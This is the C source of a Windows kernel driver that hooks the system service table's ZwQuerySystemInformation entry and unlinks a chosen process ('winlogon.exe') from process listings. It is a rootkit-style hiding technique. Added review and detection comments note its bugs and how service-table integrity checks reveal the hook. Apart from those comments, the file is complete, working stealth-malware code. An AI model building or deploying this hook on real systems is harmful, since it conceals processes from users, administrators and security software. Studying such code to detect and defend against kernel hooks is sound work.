/* ******************************************************************
Name:WinHook.c
Hooks a system service call on Windows 2000 or later; x86 CPUs only.
This driver only hides the process you configure.
Copyright (C) ndis 2004, All rights reserved.
****************************************************************** */
#include <ntddk.h>
#include "WinHook.h"
/* ******************************************************************
Macro for easy hook/unhook. On x86 implementations of Zw* func-
tions, the DWORD following the first byte is the system call number,
so we reach into the Zw function passed as a parameter and pull the
number out. This makes system call hooking dependent ONLY on the
Zw* function implementation not changing.
****************************************************************** */
/* Index into the kernel service table with the 32-bit immediate that follows
 * the first opcode byte of the x86 Zw* stub passed in (layout described
 * above). The expansion is an lvalue, so the same macro reads a table slot in
 * HookSystemCall and overwrites it in HookSystemCall/UnhookSystemCall.
 * Detection note: a slot whose target lies outside the ntoskrnl image is the
 * standard indicator that a table entry has been replaced this way. */
#define SYSCALL(_function) ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)]
/* Pointer to system global service table; assigned once in DriverEntry from
 * KeServiceDescriptorTable, read through SYSCALL() by the hook/unhook code. */
PSRVTABLE ServiceTable;
#pragma code_seg("ENTRY")
/* Driver Entry.
 * Creates the \Device\WinHook device object and its \DosDevices\WinHook
 * symbolic link, points the CREATE/SHUTDOWN/CLOSE/DEVICE_CONTROL dispatch
 * entries at DriverDispatch, registers DriverUnload, records the address of
 * KeServiceDescriptorTable and installs the service-table hook.
 * Returns the failing IoCreateDevice/IoCreateSymbolicLink status on error,
 * otherwise STATUS_SUCCESS. RegistryPath is not used. */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
NTSTATUS nRet;
/* NOTE(review): never initialized here. If IoCreateDevice fails without
 * writing its output parameter, the NULL test on the failure path below
 * reads an indeterminate pointer and may pass garbage to IoDeleteDevice. */
PDEVICE_OBJECT lpHookDeviceObject;
UNICODE_STRING uszDeviceName,uszDriverName;
RtlInitUnicodeString(&uszDeviceName,L"\\Device\\WinHook");
RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
nRet = IoCreateDevice(
DriverObject, 0,
&uszDeviceName,
FILE_DEVICE_WINHOOK,
0, TRUE,
&lpHookDeviceObject
);
if(NT_SUCCESS(nRet)){
/* Create the symbolic link used by the user-mode GUI */
nRet = IoCreateSymbolicLink (&uszDriverName, &uszDeviceName );
/* Create dispatch points for all routines: every major function handled
 * by this driver goes through the same DriverDispatch. */
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
DriverObject->DriverUnload = DriverUnload;
}
if(!NT_SUCCESS(nRet)){
/* Reached both when IoCreateDevice failed and when only the symbolic link
 * failed; the link is deleted in either case, even if it was never made. */
DbgPrint("******WinHook:Failed to create device!******\n");
if(lpHookDeviceObject){
IoDeleteDevice(lpHookDeviceObject);
}
IoDeleteSymbolicLink(&uszDriverName);
return nRet;
}
/* Pointer to system table data structure is an NTOSKRNL export */
ServiceTable = KeServiceDescriptorTable;
/* NOTE(review): a pointer is printed with %x; %p is the matching specifier. */
DbgPrint("WinHook:SystemCallService: %x\n",ServiceTable);
/* Install System Call Hook. Patching the service table at load time is the
 * textbook kernel-hook indicator: driver-load auditing and periodic
 * service-table integrity checks are the places that surface it. No flag
 * records that the hook is in place; DriverUnload unhooks unconditionally. */
HookSystemCall();
DbgPrint("******WinHook:Hook System Call Service******\n");
return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("SETHOOK")
/* Install System Call Hook.
 * Saves the current service-table entry for ZwQuerySystemInformation in
 * RealZwQuerySystemInformation (declared outside this file, presumably in
 * WinHook.h) and replaces the entry with HookZwQuerySystemInformation.
 * Not idempotent: a second call stores the hook itself as the "real" entry,
 * after which UnhookSystemCall can no longer restore the original.
 * Detection note: once this has run, the entry no longer points into the
 * ntoskrnl image, which is what service-table integrity checks look for. */
VOID HookSystemCall()
{
RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation);
SYSCALL(ZwQuerySystemInformation) = (PVOID)HookZwQuerySystemInformation;
return;
}
#pragma code_seg()
#pragma code_seg("UNHOOK")
/* Uninstall System Call Hook.
 * Writes the pointer saved by HookSystemCall back into the service-table
 * entry. It does not check that the entry still holds
 * HookZwQuerySystemInformation, so anything else that modified the same
 * entry after HookSystemCall ran is overwritten, and nothing waits for calls
 * already executing inside the hook before the driver image goes away. */
VOID UnhookSystemCall()
{
SYSCALL(ZwQuerySystemInformation) = (PVOID)RealZwQuerySystemInformation;
return;
}
#pragma code_seg()
#pragma code_seg("HOOK")
/* Hook function: the replacement ZwQuerySystemInformation.
 * Forwards every call to the saved original. When that call succeeds and
 * SystemInformationClass is 5 (SystemProcessInformation) it walks the
 * SYSTEM_PROCESSES list the original wrote into SystemInformation and
 * unlinks each entry whose ProcessName equals "winlogon.exe"
 * (case-insensitive; third argument of RtlCompareUnicodeString) by folding
 * the entry's NextEntryDelta into the previous entry's.
 * The original status and *ReturnLength are returned unchanged, so the
 * unlinked records still occupy the buffer. That mismatch between
 * ReturnLength and the bytes reachable through NextEntryDelta, or any
 * difference against a second process enumeration, is how this class of
 * hiding is detected. */
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
NTSTATUS nRet;
UNICODE_STRING uszProcName;
/* Name of the process to hide, compared against every list entry below. */
RtlInitUnicodeString(&uszProcName, L"winlogon.exe");
/* Call the original service first; everything below only edits its output. */
nRet = (RealZwQuerySystemInformation)(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength
);
if(NT_SUCCESS(nRet))
{
/* 5 == SystemProcessInformation */
if(SystemInformationClass==5)
{
/* Entries are chained by byte offsets (NextEntryDelta); 0 marks the last. */
struct _SYSTEM_PROCESSES *lpCurr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *lpPrev = NULL;
/* Step past the first entry before the loop, so lpPrev is still NULL when
 * the second entry is examined. Casting the lvalue and assigning through it
 * is a compiler extension, here and in the two advances further down. */
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
while(lpCurr)
{
/* Hide the process you setting */
if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0)
{
if(lpPrev)
{
/* Splice lpCurr out: lpPrev now jumps over it, or ends the list. */
if(lpCurr->NextEntryDelta) {
lpPrev->NextEntryDelta += lpCurr->NextEntryDelta;
}
else {
lpPrev->NextEntryDelta = 0;
}
}
else {
/* No previous entry: this advances (or clears) only this function's
 * own copy of the SystemInformation parameter. */
if(lpCurr->NextEntryDelta) {
(char *)SystemInformation += lpCurr->NextEntryDelta;
}
else {
SystemInformation = NULL;
}
}
/* Move on without making the removed entry the new lpPrev. */
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
else {
lpCurr = NULL;
break;
}
} /* if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0) */
/* Ordinary advance for an entry that was kept. */
if(lpCurr != NULL) {
lpPrev = lpCurr;
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
else{
lpCurr = NULL;
}
}
} /* end while(lpCurr) */
} /* End if(SystemInformationClass==5) */
} /* End if(NT_SUCCESS(nRet)) */
return nRet;
}
#pragma code_seg()
#pragma code_seg("PATCH")
/* Driver Dispatch: completes every IRP routed here at once with
 * STATUS_SUCCESS and zero bytes of output. The four major functions wired
 * up in DriverEntry only produce a debug trace; DeviceObject is not used. */
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
    /* Current stack location tells us which major function this IRP carries. */
    PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
    UCHAR major = stack->MajorFunction;

    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;

    if (major == IRP_MJ_CREATE || major == IRP_MJ_SHUTDOWN ||
        major == IRP_MJ_CLOSE || major == IRP_MJ_DEVICE_CONTROL) {
        DbgPrint("WinHook Dispatch\n");
    }

    IoCompleteRequest(Irp,IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("UNLOAD")
/* Driver Unload */
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
    /* Same link name DriverEntry created; built up front, it has no side effect. */
    UNICODE_STRING linkName;
    RtlInitUnicodeString(&linkName, L"\\DosDevices\\WinHook");

    DbgPrint("******WinHook Driver Unloading******\n");

    /* Put the original service-table entry back before the image goes away. */
    UnhookSystemCall();

    /* Tear down the user-mode link, then the device object it pointed at. */
    IoDeleteSymbolicLink(&linkName);
    IoDeleteDevice(DriverObject->DeviceObject);

    DbgPrint("******Deleted devices******\n");
}
#pragma code_seg()